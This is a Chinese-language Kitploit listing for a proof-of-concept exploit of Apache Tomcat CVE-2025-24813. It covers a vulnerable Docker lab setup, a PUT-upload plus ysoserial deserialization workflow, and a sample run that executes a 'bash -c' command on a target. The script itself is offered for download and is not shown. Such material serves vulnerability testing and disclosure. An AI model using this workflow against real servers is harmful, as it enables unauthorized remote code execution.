Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-24813 — 针对 Apache Tomcat 中漏洞 CVE-2025-24813 的概念验证(PoC)脚本。 | Kitploit
工具/GitHubGitHub/hakankarabacak/cve-2025-24813
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具Payload 开发
GitHubhakankarabacak/cve-2025-24813

CVE-2025-24813

针对 Apache Tomcat 中漏洞 CVE-2025-24813 的概念验证(PoC)脚本。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-24813

针对 Apache Tomcat 中 CVE-2025-24813 漏洞的概念验证 (PoC) 脚本。

该脚本基于相关链接进行了修改,并根据我的需求进行了调整。

搭建漏洞环境(Tomcat)

提供的环境基于官方 Tomcat 9.0.90 镜像。它移除了服务器的只读限制,并配置其将会话数据保存到磁盘。然后,通过将 ROOT.war 文件复制到 Tomcat 的 webapps/ 目录,自动部署应用程序。

root@kitploit:~
docker build -t cve-2025-24813 .
docker run --name cve-2025-24813 -it -d -p 8080:8080 cve-2025-24813

工作流程

  1. 通过放置一个包含 Content-Range 头部的 check.txt 文件,验证服务器是否接受 PUT 请求。
  2. 如果服务器可写,则使用 ysoserial 为所需的命令生成 payload。
  3. 通过 PUT 请求将恶意会话文件上传到目录,并将其与会话 ID 和文件名关联。
  4. 发送带有自定义 JSESSIONID 的 GET 请求,触发反序列化。
  5. 临时 payload 文件从目录中删除。

使用方法

root@kitploit:~
$ python3 cve_2025_24813.py

██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ███████╗      ██████╗ ██╗  ██╗ █████╗  ██╗██████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██╔════╝      ╚════██╗██║  ██║██╔══██╗███║╚════██╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗█████╗ █████╔╝███████║╚█████╔╝╚██║ █████╔╝
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══╝ ╚════██║██╔══██╗ ██║ ╚═══██╗
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗███████║      ███████╗     ██║╚█████╔╝ ██║██████╔╝
╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚══════╝      ╚══════╝     ╚═╝ ╚════╝  ╚═╝╚═════╝
 
                 --- Apache Tomcat Remote Code Execution PoC by Hakan Karabacak ---

Enter target URL (e.g., http://target.com:8080): http://target.com:8080
Enter command to execute (default: bash -c echo${IFS}$(id)>/tmp/RCE): 
Enter path to ysoserial.jar (default: ysoserial.jar): 
Enter ysoserial gadget chain (default: CommonsCollections6): 
[*] Session ID: hk1337
[+] Server is writable via PUT: http://target.com:8080/check.txt
[*] Generating ysoserial payload for command: bash -c echo${IFS}$(id)>/tmp/RCE
[+] Payload generated successfully: payload.ser
[+] Payload uploaded with status 409 (Conflict): http://target.com:8080/hk1337.session
[+] Exploit succeeded! Server returned 500 after deserialization.
[+] Target http://target.com:8080 is vulnerable to CVE-2025-24813!
[+] Temporary file removed: payload.ser

PoC

https://github.com/user-attachments/assets/5a271e6f-1126-459a-852b-603f39a68616

下载工具